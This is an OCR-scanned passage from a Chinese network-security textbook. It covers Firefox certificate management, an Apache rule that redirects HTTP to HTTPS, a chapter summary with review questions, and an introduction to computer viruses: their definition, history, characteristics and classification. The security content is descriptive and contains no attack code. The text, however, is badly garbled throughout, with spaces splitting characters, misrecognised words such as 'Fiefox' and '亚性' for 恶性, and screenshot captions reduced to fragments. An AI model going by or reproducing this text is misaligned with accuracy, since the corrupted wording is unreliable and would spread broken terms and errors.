© Fiefox aboutpreferencesgprivacy 


Y 了 许 Firefox 向 Mozilla 发 送 幼 前 以 扩展 便 几 玻 告 , 帮助 进一步 改进 出 户 体验 (U) 详细 了 骨 
安全 
欺诈 内 容 和 危险 软件 防护 
Y” 拦 要 危险 与 许 入内 容 (B) 详 35 了 解 
Y 拦 关 危险 的 下 载 项 (D) 


Y 发现 流 呢 软 件 或 罕见 软件 时 发 出 去 告 (C) 


证 书 
当 服 务 器 请 求 您 的 个 人 证 书 时 
自动 选择 一 个 (S) 


9 每 次 均 询 问 我 (A) 


Y ”查询 OCSP 响应 服务 器 ， 以 确认 证 书 当前 是 否 有 效 (Q) 


图 10-7 打开 隐私 与 安全 选项 


证 书 管理 器 X 
您 的 证 书 个 人 证 书 颁发 机 构 
您 有 用 来 识别 这 些 服务 器 的 证 书 文件 
证 书 名 称 服务 器 生命 周期 过 期 时 间 四 
YDigiNotar 
DigiNotar Root CA . 永久 2025 年 4 月 1 日 
vDigiNotar BV. 
DigiNotar PKloverheid CA ... * 永久 2020 年 3 月 23 日 


查看 VM) 导出 %) 


亚 除 (D) 


确定 


图 10-8 ”查看 服务 器 证 书 
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证 书 管理 项 x 
人 的 证 书 。 个 人 服务 器 二 RE 外 x 
入 证 Firefox 如 何 来 标 总 此 丰 点 - 

您 有 用 来 识别 这 些 服务 器 的 证 书 文件 合法 的 银行 、 

证 书 名 称 服务 9 ”有 和 各 过 期 时 间 ® 
~DigiNotar 地 址 | httpsy/192168.6033| 

DigiNotar Root CA 间 证 书 状态 2025 年 4 月 1 日 
vDigiNotar BV. 0 

DigiNotar PKloverheid CA ... * 2020 年 3 月 23 日 

永久 保存 此 8 外 khP) 
可 
理 看 V) 导出 00.。 删除 (D).。 添加 例外 00.… 


确定 


图 10-9 添加 受信 任 站 点 
添加 成 功 后 就 能 访问 https 网 站 了 ,如 图 10-10 所 示 。 


https://192.16...32/indexhtml x 
€ 日 https//192168.60.32/indexhtml 
最 党 访问 | 火狐 守 方 站 点 | 新 手 上 路 [第 用 | 


welcome to https web! 


图 10-10 ”https 访问 页 面 
本 站 点 既 能 进行 http 访问 ,也 能 进行 https 访问 ,但 很 多 https 网 站 如 果 使 用 http 访 


问 ,会 重新 导向 https。 以 下 设置 只 能 通过 https 访问 。 


# 只 需要 在 httpd. conf 文件 的 <Directory "/var/www/html"> 下 添加 这 几 句 ,使 其 访问 http 的 网 页 都 
转向 https 

[1] RewriteEngine on # 开 启 重 定 向 引擎 

[2] RewriteCond % {SERVER_PORT} !^443$ # 非 443 端口 的 数据 全 部 进行 重 定向 

[3] RewriteRule ^(. * ) $ https://% {SERVER_NAME}/$1[L,R] # 把 需要 重 定向 的 内 容重 定向 
到 https 


注 : 以 上 目录 根据 配置 不 同 有 所 差异 ,请 读者 自行 项 酌 调 整 。 

含义 是 这 样 的 : 为 了 让 用 户 访问 从 传统 的 http:// 转 到 https:// 上 来 ,使 用 rewrite 规则 : 
第 一 句 : 启动 rewrite 引擎 ; 

第 二 句 : rewrite 的 条 件 是 访问 的 服务 器 端口 不 是 443 端口 ; 

第 三 句 : 这 是 正则 表达 式 ,^ 是 开头 ,$ 是 结束 ,(. * ) 是 任何 数量 的 任意 字符 。 

整个 意思 是 讲 : 启动 rewrite 模块 ,将 所 有 访问 非 443 端口 的 请 求 ,url 地 址 内 容 不 变 ， 


http:// 变 成 https://。 
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本 章 小 结 


(1) 随 着 用 户 对 Web 服务 的 依赖 性 增长 ,特别 是 电子 商务 .电子 政务 等 一 系列 网 络 应 
用 服务 的 快速 增长 ,Web 的 安全 性 越 来 越 重要 。Web 安全 技术 主要 包括 Web 服务 器 安全 
技术 、Web 应 用 服务 安全 技术 和 Web 浏览 器 安全 技术 。 

(2) 电子 邮件 的 安全 问题 备 受 人 们 关注 ,其 安全 目标 包括 邮件 分 发 安全 .邮件 传输 安全 
和 邮件 用 户 安全 。 

(3) 身份 认证 是 保护 信息 系统 安全 的 第 一 道 防 线 , 它 限制 非法 用 户 访问 网 络 资源 。 常 
用 的 身份 认证 方法 包括 口令 、 密 钥 、 记 忆 卡 、 智 能 卡 `USB Key 和 生物 特征 认证 。 

(4) PKI 是 能 够 为 所 有 网 络 应 用 透明 地 提供 采用 加 密 和 数字 签名 等 密码 服务 所 需要 的 
密 钥 和 证 书 管理 的 密 钥 管理 平台 ,是 目前 网 络 安全 建设 的 基础 与 核心 。PKI 由 认证 中 心 
(CA) .证 书库 、 密 钥 备 份 及 恢复 系统 .证书 作废 处 理 系统 和 应 用 接口 等 部 分 组 成 。 


思 考题 
. 简 述 Web 安全 目标 及 技术 。 
.电子 邮件 的 安全 目标 是 什么 ? 
. 简 术 电子 邮件 系统 的 组 成。 
、 简 述 身份 认证 方法 。 


. 简 述 Kerberos 协议 。 

. 简 述 PKI 的 主要 组 成 部 分 及 数字 证 书 的 形式 。 
. 简 述 电子 商务 的 安全 需求 。 

. 说 明 SSL 协议 和 SET 协议 的 异同 。 


co ~ 中 


第 11 音 计算 机 病毒 与 防范 技术 


当前 ,计算 机 病毒 已 经 威胁 到 了 各 个 应 用 领域 ,由 此 而 造成 的 破坏 和 经 济 损失 触目 惊 
心 。 在 我 国 ,计算 机 病毒 也 蔓延 得 很 快 ,还 出 现 了 不 少 "国产 ?病毒 。 在 网 络 普及 率 不 高 的 情 
况 下 ,单机 (尤其 是 个 人 微型 计算 机 ) 上 的 病毒 发 生 率 很 高 。 随 着 计算 机 网 络 的 普及 和 基于 
计算 机 的 信息 系统 的 建立 ,多 机 系统 、 多 用 户 系统 和 网 络 上 病毒 的 案例 逐渐 增加 。 世 界 上 到 
底 有 多 少 种 计算 机 病毒 , 恺 怕 谁 也 不 知道 。 因 此 为 了 减少 对 我 国 计 算 机 应 用 造成 的 影响 和 
破坏 ,需要 更 进一步 地 重视 病毒 技术 和 反 病 毒 技术 的 研究 ,制定 反 病 毒 的 对 策 。 


11.1 计算 机 病毒 概述 


11.1.1 计算 机 病毒 的 概念 


自然 环境 中 的 生物 病毒 具有 个 体 微小 、 无 完整 的 细胞 结构 、 含 单一 核酸 以 及 寄生 并 繁殖 
于 活体 细胞 内 等 特征 。 而 本 书 所 讨论 的 计算 机 病毒 ,不 同 于 自然 环境 中 的 生物 病毒 ,是 一 种 
人 工 编写 的 计算 机 程序 代码 。 

美国 著名 的 计算 机 病毒 研究 专家 F. Cohen 博士 率先 提出 了 “计算 机 病毒 * 这 一 概念 。 
早 在 1983 年 ,研究 者 们 在 计算 机 病毒 传播 的 研究 报告 中 证 实 了 世界 上 首 例 计算 机 病毒 ,并 
提出 了 蠕虫 病毒 程序 的 设计 思想 。 美 国人 Thompson 于 次 年 设计 出 了 破坏 UNIX 操作 系 
统 的 病毒 程序 。1988 年 11 月 2 日 ,美国 康 尔 大 学 研究 生 罗 特 ， 莫 里 斯 向 Internet 中 投放 
了 蠕虫 病毒 ,这 种 病毒 在 Internet 中 迅速 扩散 ,导致 了 大 批 计 算 机 的 瘫痪 ,甚至 波及 众多 的 
欧洲 网 络 用 户 ,造成 了 几 千 万 美元 的 直接 经 济 损失 。 

计算 机 病毒 实际 上 是 一 段 程序 代码 。 类 似 自 然 界 中 的 生物 病毒 ,计算 机 病毒 具有 强大 
的 复制 能 力 ,能够 迅速 地 蔓延 到 网 络 上 的 每 一 台 计 算 机 。 病 毒 能 够 将 自己 隐藏 在 各 种 类 型 
的 文件 上 。 当 用 户 复制 感染 了 病毒 的 文件 后 ,病毒 就 伴随 着 文件 的 副本 蔓延 开 来 。 此 外 , 某 
些 计 算 机 病毒 能 够 利用 被 污染 的 程序 传送 病毒 的 载体 。 当 用 户 发 现 病毒 载体 似乎 仅仅 表现 
在 文字 或 图 像 上 时 ,它们 可 能 已 经 损坏 了 文件 .再 格式 化 了 用 户 的 硬盘 驱动 器 或 引发 了 其 他 
类 型 的 灾害 。 有 些 计 算 机 病毒 危害 性 较 小 ,它们 通过 占据 内 存 空间 降低 了 用 户 的 计算 机 
性 能 。 

可 以 从 多 个 角度 对 "计算 机 病毒 ”进行 定义 。 国 外 普遍 接受 的 定义 是 指 一 段 附着 在 其 他 
程序 上 的 能 够 实现 自我 复制 的 程序 代码 。 国 内 学 术 界 存在 以 下 几 种 "计算 机 病毒 ”的 定义 。 
一 是 通过 磁盘 、 磁 带 和 网 络 等 媒介 传播 ,能 “感染 ”其 他 程序 的 计算 机 程序 ; 二 是 可 以 实现 自 
身 复制 并 且 借 助 一 定 的 载体 存在 的 具备 潜伏 性 、 传 染 性 和 破坏 性 的 程序 ; 三 是 人 工 设计 的 
计算 机 程序 , 它 通 过 不 同 的 途径 潜伏 在 存储 媒体 或 程序 中 , 当 具 备 某 种 条 件 或 时 机 时 , 它 会 
自身 复制 并 传播 ,使 计算 机 资源 受到 不 同 程度 的 破坏 等 。 计 算 机 病毒 类 似 生物 病毒 ,能 够 入 
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侵 网 络 中 的 计算 机 系统 ,危害 正常 工作 的 计算 机 。 它 可 以 破坏 网 络 中 的 计算 机 系统 , 即 具有 
破坏 性 ; 同时 可 以 复制 自身 , 即 具有 传染 性 。 所 以 ,计算 机 病毒 就 是 可 以 通过 特定 途径 潜伏 
在 计算 机 存储 介质 (或 程序 ) 中 , 当 某 种 条 件 具备 时 即 被 激活 的 ,具有 对 计算 机 资源 进行 破坏 
作用 的 一 组 程序 或 指令 集合 。 

在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 中 明确 定义 ,病毒 是 指 “ 编 制 或 者 在 
计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 
一 组 计算 机 指令 或 者 程序 代码 ”。 

这 里 需要 指出 的 是 计算 机 病毒 也 是 一 个 程序 ,或 者 说 是 一 段 可 执行 的 代码 。 而 这 个 程 
序 或 者 可 执行 代码 对 计算 机 功能 或 存储 在 计算 机 中 的 数据 具有 破坏 性 ,并 且 具 备 传 播 性 、 隐 
项 性 偷窃 性 等 特性 。 更 宽泛 的 称呼 为 “恶意 代码 ”。 

前 面 提 及 ,最 早 的 病毒 及 其 概念 出 现在 1983 年 。1988 年 11 月 泛滥 的 Morris 蠕虫 , 则 
是 最 早 受 到 广泛 关注 的 以 互联 网 为 传播 途径 的 病毒 , 它 需 刻 之 间 使 得 6000 多 台 计 算 机 ( 占 
当时 Internet 计算 机 总 数 的 10% 多 ) 瘫 痪 ,造成 了 严重 的 后 果 。 

1998 年 CIH 病毒 造成 数 十 万 台 计算 机 受到 破坏 ,该 病毒 可 以 破坏 PC 主板 BIOS 的 可 
擦 写 内 存 ,被 视 为 第 一 个 能 够 破坏 硬件 的 病毒 。 

1999 年 的 Melissa 病毒 和 2000 年 暴发 的 “ 爱 虫 病毒 ,以 及 其 后 出 现 的 50 多 个 变种 病 
毒 是 利用 电子 邮件 和 Outlook 传播 的 病毒 ,在 世界 范围 内 造成 了 巨大 的 损失 。 

由 邮件 传播 的 病毒 ,邮件 标题 多 么 吸引 人 ,毕竟 还 是 需要 潜在 受害 者 打开 邮件 的 操作 才 
会 被 感染 。2003 年 冲击 波 、 震 荡 波 利用 Windows 的 RPC 漏洞 ,由 被 感染 的 计算 机 随机 选 
择 IP 地 址 发 送 攻击 ,感染 了 互联 网 上 大 量 主机 ,一 周 之 内 便 造成 几 十 亿美 元 的 损失 。 

后 面 的 章节 中 仍然 会 介绍 一 些 显得 "古老 ?的 病毒 知识 与 技术 ,但 目前 ,通过 互联 网 传 
播 , 利 用 操作 系统 或 软件 漏洞 实施 攻击 ,是 病毒 的 常见 形式 。 这样 的 病毒 传播 快捷 ,防范 
不 易 。 

病毒 不 仅 由 有 恶意 的 个 人 或 者 小 团体 炮制 。 作 为 人 类 生产 ,生活 的 重要 技术 领域 ,信息 
技术 也 是 国家 之 间 彼 此 争斗 .互相 防范 的 必然 领域 。 由 国家 机 器 组 织 编写 的 病毒 ,技术 含量 
高 ,破坏 力 强 大 。2010 年 发 现 的 震 网 病毒 ,通过 攻击 一 批 西门 子 生 产 的 计算 机 ,从 而 破坏 了 
这 些 机 器 控制 的 浓缩 铀 离心 机 ,被 认为 是 美国 和 以 色 列 用 来 破坏 伊朗 核 计划 而 开发 的 。 之 
后 ,由 俄罗斯 卡巴 斯 基 实 验 室 在 伊朗 发 现 的 ,被 命名 为 火焰 (Flame) 的 更 加 复杂 功能 更 强大 
病毒 。 

2017 年 ,在 全 球 暴发 的 勒索 病毒 事件 ,被 认为 是 由 黑客 改造 之 前 泄露 的 美国 国家 安全 
局 信息 武器 库 中 “永恒 之 蓝 ” 攻 击 程序 ,并 发 起 的 网 络 攻 击 事件 。 

信息 技术 及 其 相关 产业 ,作为 人 类 生产 生活 的 重要 领域 ,必然 也 是 受到 人 类 的 恶意 和 基 
于 恶意 行为 影响 的 领域 。 病 毒 技术 随 着 信息 技术 的 进步 而 不 断 进步 ,其 危害 和 影响 将 是 长 
期 的 。 


11.1.2 计算 机 病毒 的 特征 


编制 或 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 破坏 数据 ,影响 计算 机 使 用 并 能 自我 
复制 的 一 组 计算 机 指令 或 程序 代码 称 为 计算 机 病毒 。 一 般 正常 的 程序 执行 过 程 为 ,用 户 调 
用 程序 一 系统 分 配 程 序 所 需 的 资源 一 程序 完成 用 户 安排 的 任务 ,计算 机 用 户 明 确 地 知道 正 
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常 程序 的 运行 目的 。 与 此 不 同 , 计 算 机 病毒 执行 过 程 为 ,感染 正常 程序 一 正常 程序 运行 时 ， 
窃取 系统 控制 权 一 在 正常 程序 运行 前 执行 病毒 代码 ,计算 机 用 户 不 知道 甚至 不 允许 病毒 的 
运行 。 计 算 机 病毒 的 主要 特征 如 下 。 

1. 破坏 性 

计算 机 病毒 攻击 计算 机 系统 后 ,会 对 计算 机 系统 与 其 中 的 应 用 程序 产生 一 定 程度 的 破 
坏 。 良 性 病毒 对 计算 机 系统 产生 的 破坏 性 轻微 ,可 能 只 显示 些 搞笑 图 片 或 无 意义 的 语句 及 
发 出 嘟 嘟 声 等 ,只 会 浪费 计算 机 的 资源 。 亚 性 病毒 的 危害 目的 明确 ,如 破坏 磁盘 数据 、 删 除 
磁盘 文件 ,以 及 非法 加 密 磁盘 、 非 法 格式 化 磁盘 ,有 的 恶性 病毒 会 对 磁盘 数据 造成 无 法 恢复 
的 破坏 。 

凡是 正常 程序 能 够 接触 到 的 计算 机 资源 都 有 可 能 遭 到 计算 机 病毒 的 破坏 ,病毒 破坏 计 
算 机 资源 的 表现 为 : 耗费 CPU 时 间 和 内 存 资源 ,从 而 阻塞 正常 的 进程 ; 破坏 计算 机 系统 中 
的 数据 或 文件 ; 打 乱 计算 机 屏幕 的 正常 显示 内 容 等 。 

2. 隐蔽 性 

病毒 的 设计 者 往往 将 计算 机 病毒 设计 得 短小 精 悍 ,然后 将 它们 隐藏 到 正常 程序 中 ,这 样 
病毒 程序 和 正常 程序 通常 不 易 区 分 。 如 果 计 算 机 系统 没有 安装 反 病 毒 软 件 , 那 么 计算 机 病 
毒 程序 就 很 容易 取得 系统 的 控制 权 ,此 后 病毒 可 以 在 短 时 间 内 传染 大 量 的 计算 机 程序 。 另 
外 ,尽管 计算 机 系统 已 经 感染 了 病毒 ,但 是 系统 中 的 程序 仍然 能 够 正常 运行 ,这 种 假象 对 计 
算 机 用 户 来 说 具有 很 强 的 欺骗 性 。 试 想 , 如 果 计 算 机 系统 感染 病毒 后 就 无 法 正常 运转 ,那么 
这 种 病毒 也 就 无 法 传染 到 其 他 的 计算 机 。 计 算 机 病毒 在 用 户 毫 不 知情 的 情况 下 轻易 地 传播 
到 其 他 的 计算 机 中 , 正 是 得 益 于 其 良好 的 隐蔽 性 。 病 毒 代 码 设计 得 越 简练 ,其 隐蔽 性 也 就 越 
强 。 大 多 数 病毒 代码 一 般 只 有 几 百 字 节 ,而 计算 机 的 数据 处 理 速度 很 快 ,将 这 区 区 几 百 字 节 
代码 添加 到 正常 程序 之 中 ,计算 机 根本 无 法 察觉 。 一 些 高 水 平 的 病毒 设计 者 抓 住 了 这 一 特 
点 ,将 病毒 程序 夹杂 在 大 量 的 正常 程序 中 ,计算 机 也 很 难 发 现 这 些 非法 行为 。 

3. 潜伏 性 

为 了 大 范围 地 破坏 计算 机 ,多 数 病毒 在 成 功 和 人 侵 计算 机 系统 后 长 期 地 隐藏 在 那里 , 待 到 
特定 的 条 件 满足 后 才 会 破坏 被 感染 的 计算 机 系统 。 病 毒 *PETER-2” 在 感染 计算 机 系统 后 ， 
在 每 年 2 月 27 日 会 向 计算 机 用 户 提 出 3 个 问题 ,如 果 该 用 户 回答 错误 ,病毒 就 会 非法 地 将 
计算 机 硬盘 加 密 。 病 毒 “ 黑 色 星 期 五 ”选择 在 每 月 13 日 又 恰 逢 星期 五 时 暴发 ,导致 大 量 的 计 
算 机 瘫痪 。 国 内 的 “上 海 一 号 ?病毒 会 选择 在 每 年 3 月 .6 月 .9 月 的 第 13 天 改作。 当然 ,最 
令 人 难忘 的 便 是 每 年 的 4 月 26 日 ,届时 大 批 计算 机 将 因为 CIH 病毒 发 作 而 瘫痪 ,计算 机 用 
户 不 得 不 通过 更 改 系统 日 期 的 方法 躲 过 此 劫 。 在 平时 这 些 病 毒 不 会 干扰 计算 机 系统 的 正常 
运转 ,只 有 在 发 作 日 病毒 才 会 对 计算 机 造成 灾难 性 的 破坏 。 

4. 传染 性 

传染 性 是 计算 机 病毒 的 一 个 重要 特征 。 病 毒 通过 修改 正常 程序 的 代码 ,将 自身 的 副本 
添加 到 正常 程序 中 ,从 而 达到 传播 的 目的 。 正 常 的 计算 机 程序 一 般 不 会 将 自身 的 副本 强行 
添加 到 其 他 程序 中 ; 而 病毒 却 可 以 通过 非法 的 途径 将 自身 的 副本 强行 添加 到 一 切 符合 其 传 
染 条 件 的 未 受到 传染 的 程序 之 上 。 此 外 ,病毒 还 可 以 通过 各 种 媒介 ,如 UU 盘 ,光盘 或 计算 机 
网 络 传 播 给 其 他 计算 机 。 当 用 户 在 一 台 计 算 机 上 检测 到 病毒 时 ,这 就 意味 着 曾经 与 这 台 计 
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算 机 连接 过 的 U 盘 也 已 经 被 病毒 感染 ,而 与 这 台 计 算 机 处 于 同一 局 域 网 的 其 他 计算 机 或 许 
也 中 病毒 了 。 因 此 ,传染 性 成 为 认定 一 段 代码 是 否 为 计算 机 病毒 的 首要 条 件 。 

被 病毒 传染 的 程序 能 够 成 为 病毒 传播 的 媒介 ,就 类 似 流感 一 般 ,能够 在 人 际 之 间 进 行 传 
播 。 当 用 户 发 现 正常 程序 的 文字 或 图 像 出 现 异常 现象 时 ,病毒 可 能 已 经 损坏 了 硬盘 上 的 数 
据 文件 ,甚至 会 引发 其 他 类 型 的 灾害 。 即 使 是 良性 病毒 ,虽然 它们 对 计算 机 系统 的 危害 有 
限 , 但 是 它们 仍然 能 够 占据 内 存 空 间 , 甚 至 降低 计算 机 系统 的 性 能 。 在 传播 方式 上 ,计算 机 
病毒 和 生物 病毒 类 似 , 这 也 是 “计算 机 病毒 ”名称 的 由 来 。 

5. 不 可 预见 性 

对 众多 的 反 病毒 软件 而 言 ,计算 机 病毒 还 有 不 可 预见 性 。 不 同 的 病毒 设计 者 ,他 们 设计 
的 病毒 代码 千差万别 ,不 同类 别 的 病毒 会 执行 一 些 共有 的 操作 ,如 常 驻 内 存 , 修 改 中 断 等 。 
有 些 人 通过 研究 病毒 的 共同 特征 ,编制 出 能 够 检测 所 有 病毒 的 程序 。 在 实验 环境 中 ,这 种 程 
序 成 功 地 检测 到 了 一 些 新 型 病毒 ,但 由 于 目前 的 软件 种 类 繁多 ,并 且 某 些 正 常 程序 也 应 用 了 
类 似 病毒 的 操作 。 借 鉴 这 种 思想 开发 的 反 病 毒 软件 势必 存在 误 检 率 高 的 缺陷 ,同时 病毒 的 
制作 技术 也 在 不 断 地 发 展 ,因此 计算 机 病毒 总 是 先 于 反 病毒 软件 出 现 的 。 


11.1.3 计算 机 病毒 的 分 类 


随 着 计算 机 网 络 应 用 的 不 断 普 及 ,网 络 中 病毒 的 种 类 也 在 快速 地 增长 。 国 外 的 调查 报 
告 显示 ,每 周 网 络 上 新 增 10 种 计算 机 病毒 。 另 外 ,根据 我 国 公安 部 的 统计 ,国内 每 月 新 增 
4 一 6 种 新 型 病毒 。 目 前 ,针对 计算 机 病毒 存在 多 种 分 类 方法 。 同 一 种 病毒 可 能 同时 具备 多 
种 特征 ,因此 在 病毒 分 类 上 会 产生 交叉 。 

1. 根据 计算 机 病毒 侵入 的 操作 系统 来 划分 

根据 计算 机 病毒 侵入 的 操作 系统 来 划分 ,可 以 分 为 以 下 几 种 。 

(1) 侵入 DOS 操作 系统 的 病毒 。 这 类 病毒 产生 得 最 早 ,它们 往往 选择 单独 的 计算 机 作 
为 攻击 目标 。 随 着 计算 机 网 络 的 普及 ,它们 慢 慢 地 淡出 了 人 们 的 视野 。20 世纪 八 九 十 年 
代 ,“ 小 球 ” 病 毒 “ 大 麻 " 病 毒 及 “黑色 星期 五 ”病毒 等 都 是 常见 的 DOS 病毒 。 

(2) 侵入 Windows 操作 系统 的 病毒 。20 世纪 90 年 代 , 计 算 机 开始 在 中 国 迅 速 地 普及 。 
与 此 同时 ,Windows 病毒 便 开始 像 瘟疫 一 样 广泛 地 流行 开 来 。CIH 病毒 便 是 Windows 病 
毒 家 族 中 的 一 员 。 

(3) 侵入 UNIX 操作 系统 的 病毒 。 当 前 ,UNIX 操作 系统 应 用 十 分 广泛 ,许多 大 型 的 管 
理 信 息 系 统 都 采用 UNIX 作为 其 操作 系统 。 这 样 ,侵入 UNIX 操作 系统 的 病毒 就 出 现 了 ， 
而 它们 的 危害 性 往往 非常 巨大 。 

(4) 侵入 OS/2 操作 系统 的 病毒 。 最 初 ,Microsoft 和 IBM 公司 共同 研发 OS/2 操作 系 
统 。 此 后 ,Microsoft 退出 OS/2 操作 系统 的 研发 工作 ,IBM 最 终 完成 了 这 项 任务 。OS/2 是 
“Operating System/2” 的 缩写 ,是 因为 该 系统 作为 [BM 第 二 代 个 人 计算 机 PS/2 系统 产品 
的 理想 操作 系统 引入 的 。 

不 久 ,IBM 公司 对 外 宣布 自 2005 年 12 月 23 日 起 ,停止 销售 和 支持 OS/2 系统 。OS/2 
的 支持 者 要 求 [BM 公司 公开 OS/2 的 源 代码 ,尽管 当时 OS/2 仍然 占有 部 分 市 场 。IBM 公 
司 委婉 地 拒绝 了 OS/2 支持 者 的 请 求 , 并 声称 自 2006 年 起 ,除非 他 们 进行 特殊 的 预约 ,否则 
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将 得 不 到 进一步 的 技术 支持 。 同 时 ,IBM 公司 决定 在 2006 年 12 月 23 日 停止 OS/2 所 有 产 
品 的 销售 ,而 多 任务 操作 系统 不 久 也 会 停止 销售 ,公司 将 主要 业务 向 Linux 操作 系统 转移 。 
对 IBM 公司 来 说 ,这 是 个 不 错 的 决策 : 因为 OS/2 及 其 相关 产品 已 经 销售 了 20 多 年 ,但 从 
OS/2 Presentation Manager 到 Warp ,每 一 款 产 品 都 受到 了 微软 同类 产品 的 挤 奈 。 

OS/2 在 随后 的 版 本 中 也 引入 了 线性 可 执行 文件 (Linear eXecutable) 格 式 。 在 这 种 文 
件 格 式 上 运行 的 病毒 不 太 多 ,如 OS2/Myname 病毒 。 这 种 病毒 巧妙 地 使 用 了 一 些 系 统 调 
用 ,如 DosFindFirst()、DosFindNext()、DosOpen()、DosRead() 和 DosWrite() 来 定位 可 执 
行文 件 ,然后 用 自身 重 写 这 些 可 执行 文件 。 这 种 病毒 仅 在 当前 目录 中 寻找 扩展 名 为 . exe 的 
文件 ,在 感染 之 前 并 不 识别 OS/2 线性 可 执行 文件 ,仅仅 是 用 自己 的 副本 来 重 写 所 有 的 文 
件 。 尽管 如 此 ,OS2/Myname 病毒 的 执行 过 程 证 实 , 这 种 病毒 具备 线性 可 执行 文件 的 格式 ， 
同时 说 明 这 种 病毒 依赖 于 OS/2 操作 系统 的 环境 。 

2. 根据 计算 机 病毒 的 链接 方式 来 划分 

根据 计算 机 病毒 的 链接 方式 来 划分 ,可 以 分 为 以 下 几 种 。 

(1) 源 代码 病毒 。 这 种 病毒 针对 高 级 语言 (C 语言 .VB 语言 等 ) 编 写 的 程序 。 病 毒 编写 
者 蓄意 将 该 病毒 代码 插入 到 高 级 语言 所 编写 的 源 代码 中 ,病毒 代码 经 过 编译 后 将 构成 合法 
程序 的 一 部 分 。 

(2) 垦 入 型 病毒 。 这 种 病毒 将 自身 嵌入 到 正常 程序 中 , 换 句 话说 ,病毒 的 主体 程序 与 其 
侵入 的 程序 以 插入 的 方式 进行 链接 。 

(3) 外 壳 型 病毒 。 这 种 病毒 并 不 修改 正常 程序 ,而 将 自身 像 外 壳 一 样 包 训 在 正常 程序 
周围 ,因此 而 得 名 。 这 种 病毒 包含 的 技术 含量 不 高 ,初学 程序 设计 的 人 即 可 编写 。 这 种 病毒 
会 改变 正常 文件 的 大 小 ,因此 通过 测试 文件 大 小 的 方法 即 可 将 此 病毒 查 出 。 

(4) 操作 系统 型 病毒 。 这 种 病毒 破坏 力 很 强 ,可 以 导致 整个 计算 机 操作 系统 瘫痪 。 该 
病毒 的 攻击 机 理 是 用 预先 编写 好 的 病毒 代码 加 入 或 代替 部 分 操作 系统 代码 进行 工作 的 。 这 
种 病毒 的 典型 代表 是 “ 圆 点 "病毒 和 “大 麻 " 病 毒 ,它们 会 严重 地 破坏 操作 系统 。 

3. 根据 计算 机 病毒 的 传染 对 象 来 划分 

计算 机 病毒 具有 传染 性 的 本 质 属 性 ,于 是 根据 计算 机 病毒 的 传染 方式 进行 划分 ,病毒 分 
为 以 下 几 种 。 

(1) 磁盘 引导 型 病毒 。 磁 盘 引导 区 传染 的 病毒 是 用 自身 的 部 分 或 全 部 逻辑 来 替代 正常 
的 引导 记录 的 ,同时 将 正常 的 引导 记录 隐藏 在 磁盘 的 其 他 区 域 。 由 于 计算 机 读 取 磁盘 首先 
要 读 取 其 引导 区 ,因此 这 种 病毒 在 运行 之 初 (如 系统 启动 时 ) 就 能 轻易 地 获得 计算 机 的 控制 
权 , 其 传染 性 很 强 。 由 于 在 磁盘 引导 区 内 存储 着 磁盘 使 用 的 重要 信息 ,因此 ,如 果 磁 盘 上 被 
隐藏 的 正常 引导 记录 没有 及 时 地 得 到 保护 ,那么 在 磁盘 写 入 的 过 程 中 正常 引导 记录 就 会 被 
破坏 。 这 类 病毒 很 多 ,如 “大 麻 " 病 毒 和 “小 球 " 病 毒 。 

(2) 操作 系统 型 病毒 。 计 算 机 操作 系统 由 扩展 名 为 . sys、. exe 和 . dll 等 多 种 可 执行 程 
序 及 程序 模块 组 成 。 操 作 系 统 型 病毒 传染 的 目标 为 操作 系统 中 的 一 些 程序 和 程序 模块 。 一 
般 来 说 ,作为 计算 机 操作 系统 的 一 部 分 ,只 要 计算 机 开机 ,操作 系统 型 病毒 就 处 于 随时 被 触 
发 的 状态 。 计 算 机 操作 系统 的 开放 性 和 不 完整 性 为 这 类 病毒 的 产生 与 传染 创造 了 基础 条 
件 。“ 黑 色 星期 五 ”就 是 典型 的 操作 系统 型 病毒 。 
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(3) 感染 可 执行 程序 的 病毒 。 以 可 执行 程序 为 媒介 传播 的 病毒 通常 隐藏 在 可 执行 程序 
中 ,一 旦 可 执行 程序 被 执行 ,寄生 在 其 中 的 病毒 就 会 被 激活 。 病 毒 程序 首先 被 执行 ,然后 常 
驻 内 存 , 通 过 设置 病毒 的 触发 条 件 进行 大 范围 的 传播 。 

(4) 感染 带 有 宏 的 文档 。 随 着 计算 机 网 络 的 推广 .普及 ,公司 的 白领 们 习惯 使 用 
Internet 来 传递 Word 文档 ,病毒 家 族 中 的 新 成 员 一 一 宏 病 毒 开 始 粉 墨 登 场 。 宏 病毒 寄生 
于 Word 文档 或 模板 的 宏 中 。 一 旦 用 户 打开 包含 宏 病 毒 的 文档 , 宏 病 毒 就 会 被 激活 并 转移 
到 用 户 计算 机 的 Normal 模板 中 。 如 此 一 来 ,计算 机 用 户 自动 保存 的 Word 文档 就 会 携带 这 
种 宏 病毒 。 更 糟糕 的 是 ,如 果 其 他 的 用 户 在 自己 的 计算 机 中 打开 了 已 经 感染 这 种 宏 病 毒 的 
Word 文档 , 宏 病 毒 就 会 轻易 地 转移 到 此 用 户 的 计算 机 中 。 

以 上 4 种 病毒 ,实际 上 可 以 概括 为 两 大 类 : 一 类 是 病毒 隐藏 在 计算 机 的 引导 扇 区 中 ; 另 
一 类 是 病毒 隐藏 在 计算 机 的 文件 中 。 

4. 根据 计算 机 病毒 的 传播 媒介 来 划分 

根据 病毒 的 传播 媒介 ,计算 机 病毒 可 以 分 为 单机 型 病毒 和 网 络 型 病毒 两 种 。 

(1) 单机 型 病毒 。 单 机 型 病毒 的 传播 媒介 是 磁盘 。 通 常情 况 下 ,单机 型 病毒 按照 以 下 
的 方式 进行 传播 : 病毒 首先 传染 移动 存储 设备 (如 USB 盘 、 移 动 硬盘 ); 移动 存储 设备 上 的 
病毒 再 传染 固定 存储 设备 (计算 机 硬盘 ), 从 而 进一步 地 传染 计算 机 系统 ; 计算 机 系统 上 的 
病毒 再 传染 其 他 的 移动 存储 设备 ,这 些 被 传染 的 移动 存储 设备 进而 再 去 传染 其 他 的 计算 机 
系统 。 典 型 的 单机 型 病毒 有 CIH 病毒 。 

(2) 网 络 型 病毒 。 网 络 型 病毒 的 传播 媒介 不 再 是 磁盘 ,它们 通过 计算 机 网 络 进行 传播 。 
网 络 信息 传播 的 快捷 性 导致 了 这 种 病毒 具备 更 强 的 传染 能 力 , 它 们 会 对 计算 机 网 络 造成 灾 
难 性 的 破坏 。 典 型 的 网 络 型 病毒 有 “ 尼 姆 达 ” 病 毒 。 

